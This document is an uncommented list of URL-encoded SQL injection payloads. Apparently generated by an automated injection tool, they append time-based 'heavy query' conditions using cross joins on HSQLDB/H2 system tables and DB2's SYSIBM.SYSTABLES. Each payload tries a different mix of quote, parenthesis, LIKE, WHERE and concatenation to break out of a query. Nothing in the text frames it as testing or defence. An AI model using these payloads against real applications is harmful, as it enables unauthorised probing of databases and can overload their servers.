foo%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%283498%3D3498 foo%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%287857%3D7857 foo%29%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%282669%3D2669 foo%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 foo%27%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27rHMQ%27%3D%27rHMQ foo%27%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27iNcy%27%3D%27iNcy foo%27%29%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27PLir%27%3D%27PLir foo%27%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27qLXM%27%3D%27qLXM foo%27%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27pbVd%27%20LIKE%20%27pbVd foo%27%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27gQYI%27%20LIKE%20%27gQYI foo%27%29%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27ztZv%27%20LIKE%20%27ztZv foo%27%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27PMfs%27%20LIKE%20%27PMfs foo%22%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22ulYO%22%3D%22ulYO foo%22%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22YYer%22%3D%22YYer foo%22%29%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22YllB%22%3D%22YllB foo%22%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22Riio%22%3D%22Riio foo%22%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22gtLs%22%20LIKE%20%22gtLs foo%22%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22CfIN%22%20LIKE%20%22CfIN foo%22%29%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22MkcB%22%20LIKE%20%22MkcB foo%22%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22ZaFf%22%20LIKE%20%22ZaFf foo%25%27%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27mGMR%27%3D%27mGMR foo%00%27%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27Nbbo%27%3D%27Nbbo foo%27%29%20WHERE%205863%3D5863%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 foo%22%29%20WHERE%207922%3D7922%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 foo%29%20WHERE%207722%3D7722%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 foo%27%20WHERE%209005%3D9005%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 foo%22%20WHERE%201208%3D1208%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 foo%20WHERE%206899%3D6899%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 foo%27%7C%7C%28SELECT%20%27ANwd%27%20FROM%20DUAL%20WHERE%209741%3D9741%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27PXOw%27%20WHERE%208662%3D8662%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20zOYB%20WHERE%206059%3D6059%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%2B%27 foo%27%2B%28SELECT%20%27iHep%27%20WHERE%204156%3D4156%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%23 foo%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%29%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%25%27%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%25%27%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%25%27%29%29%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%25%27%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%00%27%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%00%27%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%29%20WHERE%202373%3D2373%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%29%20WHERE%208559%3D8559%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%29%20WHERE%206170%3D6170%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%20WHERE%205189%3D5189%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%22%20WHERE%205588%3D5588%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%20WHERE%205030%3D5030%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%7C%7C%28SELECT%20%27ZKlv%27%20FROM%20DUAL%20WHERE%208260%3D8260%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%7C%7C%28SELECT%20%27rBDO%27%20WHERE%205362%3D5362%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%2B%28SELECT%20RXuS%20WHERE%207653%3D7653%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%2B%28SELECT%20%27Ohmh%27%20WHERE%205912%3D5912%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%203468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- foo%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%22%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%282729%3D2729 foo%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%289996%3D9996 foo%29%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%281462%3D1462 foo%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 foo%27%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27Ihxl%27%3D%27Ihxl foo%27%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27jaTs%27%3D%27jaTs foo%27%29%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27YGbI%27%3D%27YGbI foo%27%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27CxTL%27%3D%27CxTL foo%27%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27ryIr%27%20LIKE%20%27ryIr foo%27%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27bayq%27%20LIKE%20%27bayq foo%27%29%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27gzuF%27%20LIKE%20%27gzuF foo%27%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27avkm%27%20LIKE%20%27avkm foo%22%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22lNcq%22%3D%22lNcq foo%22%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22SDea%22%3D%22SDea foo%22%29%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22CDpz%22%3D%22CDpz foo%22%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22XgND%22%3D%22XgND foo%22%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22WMrA%22%20LIKE%20%22WMrA foo%22%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22Tswq%22%20LIKE%20%22Tswq foo%22%29%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22zACj%22%20LIKE%20%22zACj foo%22%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22qaly%22%20LIKE%20%22qaly foo%25%27%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27JRDT%27%3D%27JRDT foo%00%27%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27Pqyo%27%3D%27Pqyo foo%27%29%20WHERE%206581%3D6581%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 foo%22%29%20WHERE%209488%3D9488%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 foo%29%20WHERE%202650%3D2650%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 foo%27%20WHERE%206954%3D6954%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 foo%22%20WHERE%201816%3D1816%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 foo%20WHERE%206809%3D6809%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 